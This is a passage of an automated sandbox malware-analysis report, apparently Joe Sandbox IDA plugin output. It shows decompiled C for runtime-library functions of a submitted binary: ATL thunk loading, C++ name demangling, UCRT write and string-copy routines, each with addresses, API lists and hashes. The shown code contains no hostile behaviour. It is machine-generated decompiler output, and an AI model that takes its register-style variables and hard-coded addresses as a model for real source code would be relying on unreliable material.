					if(_t4 == 0 || E0095697D(_t15, "AtlThunk_AllocateData", 0xb3020c) == 0 || E0095697D(_t15, "AtlThunk_InitData", 0xb30210) == 0 || E0095697D(_t15, "AtlThunk_DataToCode", 0xb30214) == 0 || E0095697D(_t15, "AtlThunk_FreeData", 0xb30218) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xb3021c = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}







                      0x00956825
                      0x00956841
                      0x00956847
                      0x0095684b
                      0x009568c5
                      0x009568a9
                      0x009568ae
                      0x009568b1
                      0x009568b4
                      0x009568bd
                      0x009568bd
                      0x009568c9
                      0x00956827
                      0x00956827
                      0x0095682c
                      0x00956833
                      0x00956833

                      APIs
                      • DecodePointer.KERNEL32(?,CCCCCCCC,?,00956C3D,00B30218,?,?,?,00954C21), ref: 0095682C
                      • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,CCCCCCCC,?,00956C3D,00B30218,?,?,?,00954C21), ref: 00956841
                      • DecodePointer.KERNEL32(?), ref: 009568BD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: DecodePointer$LibraryLoad
                      • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                      • API String ID: 1423960858-1745123996
                      • Opcode ID: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction ID: 202fbf65d67dcc5ece60fe48df2c51e7545695db18827d7e5b5ddcdad34dfcea
                      • Opcode Fuzzy Hash: 209fa837fc80c9a26350b82c50d15392487b7053151ffbf257140dd832f45261
                      • Instruction Fuzzy Hash: 9001C4306D5304BBDA05EB12DC1FB8B3BA84F4274AF5440A1FD016B2A3EAA1851EC792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009671F0 Relevance: 13.6, APIs: 9, Instructions: 124COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009671F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v40;
				signed int _t46;
				char* _t47;
				char* _t60;
				void* _t77;
				char* _t102;
				char* _t106;
				void* _t112;
				void* _t113;

				_t113 = __esi;
				_t112 = __edi;
				_t77 = __ebx;
				_t46 = _a16;
				_v32 =  *((intOrPtr*)(0x9d8c88 + _t46 * 8));
				_v28 =  *((intOrPtr*)(0x9d8c8c + _t46 * 8));
				_t47 =  *0xb30640; // 0x0
				if( *_t47 == 0) {
					E0095F350( &_v16, 1);
					E0095FCA0( &_v16,  &_v32);
					if(E0096A560(_a8) == 0) {
						E0095FD40( &_v16, _a8);
					}
					if(E0096A560(_a12) == 0) {
						if(E0096A560(_a8) == 0) {
							E0095FDE0( &_v16, 0x20);
						}
						E0095FD40( &_v16, _a12);
					}
					E0095F240(_a4,  &_v16);
					return _a4;
				}
				_t106 =  *0xb30640; // 0x0
				if( *_t106 < 0x36) {
					L3:
					_t60 =  *0xb30640; // 0x0
					if( *_t60 != 0x5f) {
						E00963A20(_t77, _t112, _t113,  &_v40, _a12, _a16, _a8, 0);
						if(_a16 != 1) {
							_v8 = 0;
						} else {
							_v8 = 1;
						}
						L00966F40(_t77, _t112, _t113, _a4,  &_v40, _v8);
						return _a4;
					}
					L4:
					E0095F1F0( &_v24,  &_v32);
					if(E0096A560(_a8) == 0 && (E0096A560(_a12) != 0 || E0096A600(_a12) == 0)) {
						E0095FD40( &_v24, _a8);
					}
					if(E0096A560(_a12) == 0) {
						E0095FD40( &_v24, _a12);
					}
					E00965490(_t77, _t112, _t113, _a4,  &_v24);
					return _a4;
				}
				_t102 =  *0xb30640; // 0x0
				if( *_t102 <= 0x39) {
					goto L4;
				}
				goto L3;
			}

















                      0x009671f0
                      0x009671f0
                      0x009671f0
                      0x009671f6
                      0x00967207
                      0x0096720a
                      0x0096720d
                      0x00967217
                      0x00967304
                      0x00967310
                      0x0096731f
                      0x00967328
                      0x00967328
                      0x00967337
                      0x00967343
                      0x0096734a
                      0x0096734a
                      0x00967356
                      0x00967356
                      0x00967362
                      0x00000000
                      0x00967367
                      0x0096721d
                      0x00967229
                      0x00967239
                      0x00967239
                      0x00967244
                      0x009672c6
                      0x009672d2
                      0x009672dd
                      0x009672d4
                      0x009672d4
                      0x009672d4
                      0x009672f0
                      0x00000000
                      0x009672f8
                      0x00967246
                      0x0096724d
                      0x0096725c
                      0x0096727d
                      0x0096727d
                      0x0096728c
                      0x00967295
                      0x00967295
                      0x009672a2
                      0x00000000
                      0x009672aa
                      0x0096722b
                      0x00967237
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: EmptyName::is$MailboxNameName::Name::operator+=
                      • String ID:
                      • API String ID: 2270187897-0
                      • Opcode ID: 287f8bb0235469e1764668698faf7789d941823db5fec5243b9b2179ad2ca4ad
                      • Instruction ID: 41a278428aad86f7fdba3d7eea8df9797dbb8d40acbde86572982e2e14bb3a73
                      • Opcode Fuzzy Hash: 287f8bb0235469e1764668698faf7789d941823db5fec5243b9b2179ad2ca4ad
                      • Instruction Fuzzy Hash: 6D415071A04109ABCB08EF95D9A1EEE7379AF94315F108169FD269B291EB30EE04CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00968500 Relevance: 13.6, APIs: 9, Instructions: 124COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00968500(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				signed int _v5;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v96;
				char _v140;
				char _v184;
				intOrPtr _t41;
				signed int _t50;
				void* _t59;
				signed int _t61;
				signed int _t71;
				intOrPtr _t73;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				intOrPtr _t96;
				signed int _t98;
				signed int _t102;
				signed int _t103;

				_t106 = __esi;
				_t105 = __edi;
				_t66 = __ebx;
				_t94 =  *0xb30640; // 0x0
				if( *_t94 != 0x3f) {
					L2:
					E0095F350(_a4, 2);
					return _a4;
				}
				_t95 =  *0xb30640; // 0x0
				if( *((char*)(_t95 + (1 << 0))) == 0x24) {
					_t71 =  *0xb30640; // 0x0
					 *0xb30640 = _t71 + 2;
					_t96 =  *0xb30634; // 0x0
					_v20 = _t96;
					_t41 =  *0xb30638; // 0x0
					_v24 = _t41;
					_t73 =  *0xb3063c; // 0x0
					_v28 = _t73;
					E0095F5E0( &_v96);
					E0095F5E0( &_v140);
					E0095F5E0( &_v184);
					 *0xb30634 =  &_v96;
					 *0xb30638 =  &_v140;
					 *0xb3063c =  &_v184;
					E0095F3F0( &_v16);
					_v5 = 0;
					_t98 =  *0xb30640; // 0x0
					__eflags =  *_t98 - 0x3f;
					if( *_t98 != 0x3f) {
						E0095F820( &_v16, E0096A1E0(__ebx, __edi, __esi,  &_v44, 1, 1));
					} else {
						_t91 =  *0xb30640; // 0x0
						 *0xb30640 = _t91 + 1;
						E0095F820( &_v16, E00965E80(__ebx, __edi, __esi,  &_v36, 1,  &_v5));
					}
					_t50 = E0096A560( &_v16);
					__eflags = _t50;
					if(_t50 != 0) {
						 *0xb3064c = 1;
					}
					__eflags = _v5 & 0x000000ff;
					if((_v5 & 0x000000ff) == 0) {
						E0095FDE0( &_v16, 0x3c);
						E0095FD40( &_v16, E00968210(_t66, _t105, _t106, __eflags,  &_v52));
						_t59 = E00965990( &_v16);
						__eflags = _t59 - 0x3e;
						if(_t59 == 0x3e) {
							E0095FDE0( &_v16, 0x20);
						}
						E0095FDE0( &_v16, 0x3e);
						__eflags = _a8 & 0x000000ff;
						if((_a8 & 0x000000ff) != 0) {
							_t61 =  *0xb30640; // 0x0
							__eflags =  *_t61;
							if( *_t61 != 0) {
								_t102 =  *0xb30640; // 0x0
								_t103 = _t102 + 1;
								__eflags = _t103;
								 *0xb30640 = _t103;
							}
						}
					}
					 *0xb30634 = _v20;
					 *0xb30638 = _v24;
					 *0xb3063c = _v28;
					E0095F240(_a4,  &_v16);
					return _a4;
				}
				goto L2;
			}



























                      0x00968500
                      0x00968500
                      0x00968500
                      0x00968511
                      0x0096851e
                      0x00968537
                      0x0096853c
                      0x00000000
                      0x00968541
                      0x00968528
                      0x00968535
                      0x00968549
                      0x00968552
                      0x00968558
                      0x0096855e
                      0x00968561
                      0x00968566
                      0x00968569
                      0x0096856f
                      0x00968575
                      0x00968580
                      0x0096858b
                      0x00968593
                      0x0096859f
                      0x009685aa
                      0x009685b3
                      0x009685b8
                      0x009685bc
                      0x009685c5
                      0x009685c8
                      0x0096860a
                      0x009685ca
                      0x009685ca
                      0x009685d3
                      0x009685ef
                      0x009685ef
                      0x00968612
                      0x00968617
                      0x00968619
                      0x0096861b
                      0x0096861b
                      0x00968626
                      0x00968628
                      0x0096862f
                      0x00968644
                      0x0096864c
                      0x00968654
                      0x00968657
                      0x0096865e
                      0x0096865e
                      0x00968668
                      0x00968671
                      0x00968673
                      0x00968675
                      0x0096867d
                      0x0096867f
                      0x00968681
                      0x00968687
                      0x00968687
                      0x0096868a
                      0x0096868a
                      0x0096867f
                      0x00968673
                      0x00968693
                      0x0096869b
                      0x009686a4
                      0x009686b1
                      0x00000000
                      0x009686b6
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: MailboxName::operator+=$EmptyIterator_baseIterator_base::_NameName::Name::isstd::_
                      • String ID:
                      • API String ID: 3761117093-0
                      • Opcode ID: 2b6af0412a34ad6f608a0090bc7b882192aedf7a8361e6e7c0419994b0db9dc9
                      • Instruction ID: d0b072a6baf0905e63ae933f9717a34420badeae31f62cdf758b1cde218afca3
                      • Opcode Fuzzy Hash: 2b6af0412a34ad6f608a0090bc7b882192aedf7a8361e6e7c0419994b0db9dc9
                      • Instruction Fuzzy Hash: B8519670D102149BDB04EF54ECB2BEE77B5BF94310F2081A9E916572A5EF30AA58CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009C48F0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 335COMMON
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E009C48F0(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char _v93;
				signed int _v100;
				char _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				char _v196;
				signed int _t163;
				signed int _t169;
				signed char _t173;
				signed int _t174;
				intOrPtr* _t177;
				intOrPtr _t185;
				signed int _t187;
				signed int _t189;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr* _t200;
				intOrPtr* _t205;
				intOrPtr* _t209;
				void* _t217;
				void* _t221;
				void* _t222;
				void* _t223;
				void* _t285;
				void* _t286;
				signed int _t290;
				void* _t291;
				void* _t292;

				_t286 = __esi;
				_t285 = __edi;
				_t222 = __ebx;
				_t288 = _t290;
				_t291 = _t290 - 0xc0;
				_t163 =  *0xa0600c; // 0x5d529087
				_v8 = _t163 ^ _t290;
				if(_a12 != 0) {
					__eflags = _a8;
					if(_a8 == 0) {
						_v112 = 0;
					} else {
						_v112 = 1;
					}
					_v116 = _v112;
					__eflags = _v116;
					if(__eflags == 0) {
						_t221 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x26a, 0, L"%ls", L"buffer != nullptr");
						_t291 = _t291 + 0x18;
						__eflags = _t221 - 1;
						if(_t221 == 1) {
							asm("int3");
						}
					}
					__eflags = _v116;
					if(_v116 != 0) {
						_v93 =  *((intOrPtr*)( *((intOrPtr*)(0xb31198 + (_a4 >> 6) * 4)) + 0x29 + (_a4 & 0x0000003f) * 0x38));
						__eflags = _v93 - 2;
						if(_v93 == 2) {
							L13:
							_t169 = _a12;
							__eflags = _t169 % 2;
							if(_t169 % 2 != 0) {
								_v120 = 0;
							} else {
								_v120 = 1;
							}
							_v124 = _v120;
							__eflags = _v124;
							if(__eflags == 0) {
								_t217 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x272, 0, L"%ls", L"buffer_size % 2 == 0");
								_t291 = _t291 + 0x18;
								__eflags = _t217 - 1;
								if(_t217 == 1) {
									asm("int3");
								}
							}
							__eflags = _v124;
							if(_v124 != 0) {
								L21:
								__eflags =  *( *((intOrPtr*)(0xb31198 + (_a4 >> 6) * 4)) + 0x28 + (_a4 & 0x0000003f) * 0x38) & 0x20;
								if(__eflags != 0) {
									E009C5510(_a4, 0, 0, 2);
									_t291 = _t291 + 0x10;
								}
								_v100 = _a8;
								_v20 = 0;
								_v16 = 0;
								_v12 = 0;
								_t173 = L009C3F00(_t222, _a8, _t286, __eflags, _a4);
								_t292 = _t291 + 4;
								__eflags = _t173 & 0x000000ff;
								if((_t173 & 0x000000ff) == 0) {
									_t174 = (_a4 & 0x0000003f) * 0x38;
									_t233 =  *((intOrPtr*)(0xb31198 + (_a4 >> 6) * 4));
									_t270 =  *(_t233 + _t174 + 0x28) & 0x80;
									__eflags =  *(_t233 + _t174 + 0x28) & 0x80;
									if(( *(_t233 + _t174 + 0x28) & 0x80) == 0) {
										_t177 = E009C3130( &_v196, _a4, _v100, _a12);
										_t292 = _t292 + 0x10;
										_v92 =  *_t177;
										_v88 =  *((intOrPtr*)(_t177 + 4));
										_v84 =  *((intOrPtr*)(_t177 + 8));
										_t233 = _v92;
										_v20 = _v92;
										_t270 = _v88;
										_v16 = _v88;
										_v12 = _v84;
									} else {
										_v108 = _v93;
										__eflags = _v108;
										if(_v108 == 0) {
											_t193 = L009C3FE0(_t222, _t285, _t286,  &_v160, _a4, _v100, _a12);
											_t292 = _t292 + 0x10;
											_v56 =  *_t193;
											_v52 =  *((intOrPtr*)(_t193 + 4));
											_v48 =  *((intOrPtr*)(_t193 + 8));
											_v20 = _v56;
											_t233 = _v52;
											_v16 = _v52;
											_t270 = _v48;
											_v12 = _v48;
										} else {
											__eflags = _v108 - 1;
											if(_v108 == 1) {
												_t196 = E009C43F0(_t222, _t285, _t286,  &_v184, _a4, _v100, _a12);
												_t292 = _t292 + 0x10;
												_v80 =  *_t196;
												_v76 =  *((intOrPtr*)(_t196 + 4));
												_v72 =  *((intOrPtr*)(_t196 + 8));
												_v20 = _v80;
												_t233 = _v76;
												_v16 = _v76;
												_t270 = _v72;
												_v12 = _v72;
											} else {
												__eflags = _v108 - 2;
												if(_v108 == 2) {
													_t200 = E009C41E0(_t222, _t285, _t286,  &_v172, _a4, _v100, _a12);
													_t292 = _t292 + 0x10;
													_v68 =  *_t200;
													_v64 =  *((intOrPtr*)(_t200 + 4));
													_v60 =  *((intOrPtr*)(_t200 + 8));
													_t233 = _v68;
													_v20 = _v68;
													_t270 = _v64;
													_v16 = _v64;
													_v12 = _v60;
												}
											}
										}
									}
								} else {
									_t270 = _v93;
									_v104 = _v93;
									__eflags = _v104;
									if(__eflags == 0) {
										_t205 = E009C31C0(_t222, _t285, _t286, __eflags,  &_v136, _a4, _v100, _a12);
										_t292 = _t292 + 0x10;
										_v32 =  *_t205;
										_v28 =  *((intOrPtr*)(_t205 + 4));
										_v24 =  *((intOrPtr*)(_t205 + 8));
										_t233 = _v32;
										_v20 = _v32;
										_t270 = _v28;
										_v16 = _v28;
										_v12 = _v24;
									} else {
										__eflags = _v104;
										if(_v104 > 0) {
											__eflags = _v104 - 2;
											if(_v104 <= 2) {
												_t209 = E009C3DF0(_t222, _t285, _t286,  &_v148, _v100, _a12);
												_t292 = _t292 + 0xc;
												_v44 =  *_t209;
												_v40 =  *((intOrPtr*)(_t209 + 4));
												_v36 =  *((intOrPtr*)(_t209 + 8));
												_t233 = _v44;
												_v20 = _v44;
												_t270 = _v40;
												_v16 = _v40;
												_v12 = _v36;
											}
										}
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t181 = _v16 - _v12;
									__eflags = _v16 - _v12;
								} else {
									__eflags = _v20;
									if(_v20 == 0) {
										_t270 = (_a4 & 0x0000003f) * 0x38;
										_t185 =  *((intOrPtr*)(0xb31198 + (_a4 >> 6) * 4));
										_t241 =  *(_t185 + _t270 + 0x28) & 0x40;
										__eflags =  *(_t185 + _t270 + 0x28) & 0x40;
										if(( *(_t185 + _t270 + 0x28) & 0x40) == 0) {
											L50:
											 *((intOrPtr*)(L00992F70(_t241))) = 0x1c;
											_t187 = L00992F40(_t241);
											 *_t187 = 0;
											_t181 = _t187 | 0xffffffff;
											goto L52;
										}
										_t270 = _v100;
										__eflags =  *_v100 - 0x1a;
										if( *_v100 != 0x1a) {
											goto L50;
										}
										_t181 = 0;
										goto L52;
									}
									__eflags = _v20 - 5;
									if(_v20 != 5) {
										_t270 = _v20;
										_t189 = L00992F10(_t233, _v20);
									} else {
										 *((intOrPtr*)(L00992F70(_t233))) = 9;
										_t189 = L00992F40(_t233);
										 *_t189 = _v20;
									}
									_t181 = _t189 | 0xffffffff;
								}
							} else {
								 *((intOrPtr*)(L00992F40(2))) = 0;
								 *((intOrPtr*)(L00992F70(2))) = 0x16;
								_t181 = E00992900(L"buffer_size % 2 == 0", L"_write_nolock", L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x272, 0) | 0xffffffff;
							}
							goto L52;
						}
						__eflags = _v93 - 1;
						if(_v93 != 1) {
							goto L21;
						}
						goto L13;
					} else {
						 *((intOrPtr*)(L00992F40(_t223))) = 0;
						 *((intOrPtr*)(L00992F70(_t223))) = 0x16;
						_t181 = E00992900(L"buffer != nullptr", L"_write_nolock", L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x26a, 0) | 0xffffffff;
						goto L52;
					}
				} else {
					_t181 = 0;
					L52:
					return E00957280(_t181, _t222, _v8 ^ _t288, _t270, _t285, _t286);
				}
			}





























































                      0x009c48f0
                      0x009c48f0
                      0x009c48f0
                      0x009c48f3
                      0x009c48f5
                      0x009c48fb
                      0x009c4902
                      0x009c4909
                      0x009c4912
                      0x009c4916
                      0x009c4921
                      0x009c4918
                      0x009c4918
                      0x009c4918
                      0x009c492b
                      0x009c492e
                      0x009c4932
                      0x009c494c
                      0x009c4951
                      0x009c4954
                      0x009c4957
                      0x009c4959
                      0x009c4959
                      0x009c4957
                      0x009c495a
                      0x009c495e
                      0x009c49b6
                      0x009c49b9
                      0x009c49bd
                      0x009c49c9
                      0x009c49c9
                      0x009c49d5
                      0x009c49d7
                      0x009c49e2
                      0x009c49d9
                      0x009c49d9
                      0x009c49d9
                      0x009c49ec
                      0x009c49ef
                      0x009c49f3
                      0x009c4a0d
                      0x009c4a12
                      0x009c4a15
                      0x009c4a18
                      0x009c4a1a
                      0x009c4a1a
                      0x009c4a18
                      0x009c4a1b
                      0x009c4a1f
                      0x009c4a5d
                      0x009c4a78
                      0x009c4a7b
                      0x009c4a87
                      0x009c4a8c
                      0x009c4a8c
                      0x009c4a92
                      0x009c4a97
                      0x009c4a9a
                      0x009c4a9d
                      0x009c4aa4
                      0x009c4aa9
                      0x009c4aaf
                      0x009c4ab1
                      0x009c4b60
                      0x009c4b63
                      0x009c4b6f
                      0x009c4b6f
                      0x009c4b75
                      0x009c4c6f
                      0x009c4c74
                      0x009c4c79
                      0x009c4c7f
                      0x009c4c85
                      0x009c4c88
                      0x009c4c8b
                      0x009c4c8e
                      0x009c4c91
                      0x009c4c97
                      0x009c4b7b
                      0x009c4b7e
                      0x009c4b81
                      0x009c4b85
                      0x009c4baf
                      0x009c4bb4
                      0x009c4bb9
                      0x009c4bbf
                      0x009c4bc5
                      0x009c4bcb
                      0x009c4bce
                      0x009c4bd1
                      0x009c4bd4
                      0x009c4bd7
                      0x009c4b87
                      0x009c4b87
                      0x009c4b8b
                      0x009c4c2f
                      0x009c4c34
                      0x009c4c39
                      0x009c4c3f
                      0x009c4c45
                      0x009c4c4b
                      0x009c4c4e
                      0x009c4c51
                      0x009c4c54
                      0x009c4c57
                      0x009c4b91
                      0x009c4b91
                      0x009c4b95
                      0x009c4bef
                      0x009c4bf4
                      0x009c4bf9
                      0x009c4bff
                      0x009c4c05
                      0x009c4c08
                      0x009c4c0b
                      0x009c4c0e
                      0x009c4c11
                      0x009c4c17
                      0x009c4c17
                      0x009c4b95
                      0x009c4b8b
                      0x009c4c5a
                      0x009c4ab7
                      0x009c4ab7
                      0x009c4aba
                      0x009c4abd
                      0x009c4ac1
                      0x009c4ae8
                      0x009c4aed
                      0x009c4af2
                      0x009c4af8
                      0x009c4afe
                      0x009c4b01
                      0x009c4b04
                      0x009c4b07
                      0x009c4b0a
                      0x009c4b10
                      0x009c4ac3
                      0x009c4ac3
                      0x009c4ac7
                      0x009c4acd
                      0x009c4ad1
                      0x009c4b24
                      0x009c4b29
                      0x009c4b2e
                      0x009c4b34
                      0x009c4b3a
                      0x009c4b3d
                      0x009c4b40
                      0x009c4b43
                      0x009c4b46
                      0x009c4b4c
                      0x009c4b4c
                      0x009c4ad1
                      0x009c4ac7
                      0x009c4b4f
                      0x009c4c9a
                      0x009c4c9e
                      0x009c4d21
                      0x009c4d21
                      0x009c4ca0
                      0x009c4ca0
                      0x009c4ca4
                      0x009c4ce0
                      0x009c4ce3
                      0x009c4cef
                      0x009c4cef
                      0x009c4cf2
                      0x009c4d03
                      0x009c4d08
                      0x009c4d0e
                      0x009c4d13
                      0x009c4d19
                      0x00000000
                      0x009c4d19
                      0x009c4cf4
                      0x009c4cfa
                      0x009c4cfd
                      0x00000000
                      0x00000000
                      0x009c4cff
                      0x00000000
                      0x009c4cff
                      0x009c4ca6
                      0x009c4caa
                      0x009c4cc3
                      0x009c4cc7
                      0x009c4cac
                      0x009c4cb1
                      0x009c4cb7
                      0x009c4cbf
                      0x009c4cbf
                      0x009c4ccf
                      0x009c4ccf
                      0x009c4a21
                      0x009c4a26
                      0x009c4a31
                      0x009c4a55
                      0x009c4a55
                      0x00000000
                      0x009c4a1f
                      0x009c49bf
                      0x009c49c3
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009c4960
                      0x009c4965
                      0x009c4970
                      0x009c4994
                      0x00000000
                      0x009c4994
                      0x009c490b
                      0x009c490b
                      0x009c4d24
                      0x009c4d31
                      0x009c4d31

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$_write_nolock$buffer != nullptr$buffer_size % 2 == 0$minkernel\crts\ucrt\src\appcrt\lowio\write.cpp
                      • API String ID: 0-1420694404
                      • Opcode ID: b8045fecf09ea0a1b0c43c667f91cfa4feeb994699cd42e842f1e0d28a381d52
                      • Instruction ID: aab0eef57a1b7befdae3449617299380025ab2ef0b2bc4021c25e723415e2136
                      • Opcode Fuzzy Hash: b8045fecf09ea0a1b0c43c667f91cfa4feeb994699cd42e842f1e0d28a381d52
                      • Instruction Fuzzy Hash: 65E188B4E00208AFDF14DF98C895FAEBBB5AF88304F24855DE519AB392D7749940CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009AC35F Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 324COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E009AC35F(void* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				intOrPtr* _t65;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr* _t73;
				void* _t77;
				signed char _t82;
				signed int _t83;
				signed char _t86;
				void* _t87;
				intOrPtr* _t88;
				void* _t90;
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				void* _t101;
				void* _t102;
				void* _t106;
				signed int _t109;
				char* _t110;
				signed int _t111;
				signed char* _t112;
				intOrPtr _t115;
				void* _t116;
				signed int _t118;
				signed char* _t120;
				signed int _t121;
				void* _t122;
				signed char* _t123;
				signed int _t124;
				signed char* _t126;
				signed int _t127;
				char* _t128;
				intOrPtr _t131;
				signed int _t132;
				intOrPtr* _t133;
				intOrPtr _t134;
				void* _t135;
				intOrPtr _t136;
				void* _t137;
				void* _t138;
				void* _t139;

				_t116 = __ecx;
				_t109 = _a16;
				_t63 = 0;
				_v12 = 0;
				_t127 = _a4;
				if(_t109 != 0) {
					__eflags = _t127;
					if(__eflags == 0) {
						L3:
						_t110 = L"((_Dst)) != NULL && ((_SizeInBytes)) > 0";
						_t128 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
						if(L00994930(_t149, 2, _t128, 0x1e, _t63, L"%ls", _t110) == 1) {
							asm("int3");
						}
